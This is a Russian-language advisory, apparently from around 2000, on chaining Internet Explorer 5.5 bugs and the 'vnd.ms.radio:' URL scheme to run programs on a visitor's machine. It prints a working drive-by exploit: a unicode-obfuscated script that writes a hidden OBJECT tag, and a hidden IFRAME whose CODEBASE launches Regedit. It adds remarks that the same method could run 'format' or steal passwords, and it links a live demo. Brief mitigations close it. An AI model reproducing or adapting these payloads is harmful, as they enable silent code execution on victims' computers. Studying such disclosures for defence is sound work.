Дефолтовая инсталляция Internet Explorer 5.5 со всеми так называемыми патчами, сервис паками и т.п. все еще уязвима на предмет запуска файлов на удаленном компюьтере.

Дежа вю в n'ый раз:

Соединяем все новые и старые компоненты в следующем порядке:

1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978)
2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394)
3. vnd.ms.radio: http://www.malware.com/

(собственно ошибки можно использовать и по отдельности).

В Internet Explorer 5.5 есть встроенная радио-система. Довольно разрекламированная за бугром фишка. Эта "невероятная фишка" ослика IE использует свою собственную урл-схему, названную "vnd.ms.radio:". Что же, давайте посмотрим на баг <object data="" type="text/html"> и на "vnd.ms.radio:" *.url как на взаимодополняющие компоненты.

Компонент 1 - юникод для вызов проги с радио:
document.writeln('u003cu004fu0042u004au0045u0043u0054u0020
u0044u0041u0054u0041u003du0022u0043u003au005cu0057u0049u004e
u0044u004fu0057u0053u005cu0054u0045u004du0050u005cu0072u0061
u0064u0069u006fu002eu0075u0072
u006cu0022u0020u0054u0059u0050u0045u003du0022u0074u0065u0078
u0074u002fu0068u0074u006du006cu0022u0020u0057u0049
u 0044u0054u0048u003du0032u0030u0030u0020u0048u0045u0049u0047
u0048u0054u003du0032u0030u0030u0020u0073u0074u0079u006cu0065
u003du0022u0064u0069u0073u0070u006cu0061u0079u003au006eu006f
u006eu0065u0022u003eu003cu002f
u004fu0042u004au0045u0043u0054u003e');

Компонент 2 - непосредственно сам запуск любой программы на компьютере пользователя:
<IFRAME SRC="vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' CODEBASE='C:WINDOWSRegedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100 HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME>

Соединяем... и опа! Так как урл с музычкой не найден - в каталоге C:WINDOWSTEMP остается кусок кода, который и можно потом вызвать с помощью первого компонента, он то и запустит любую программу на выполнение. В данном примере запустится Regedit, но собственно запустить можно все, что угодно - например какой-нить format или скажем send_me_all_your_password :)))

Работающий пример: [проверено на дефолтовых инсталляциях win98 и дефолтовых инсталляциях IE5.5, и ось, и ослик пропатчены самыми последними заплатками] http://www.malware.com/drivel.html. Посмотрите в исходнике как все сделано. 

Замечания:
1. Работает против пропатченных виндов и IE 5.5
2. Нет возможности подключить внешний код, хотя может у кого получится ;)
3. Патч-монстр в 1.5 мегабайта датированный 9 Августом 2000 года ровным счетом ничего не делает (http://www.microsoft.com/technet/security/bulletin/MS00-055.asp)
4. Отрубите ActiveX и Scripting и переместите temp папку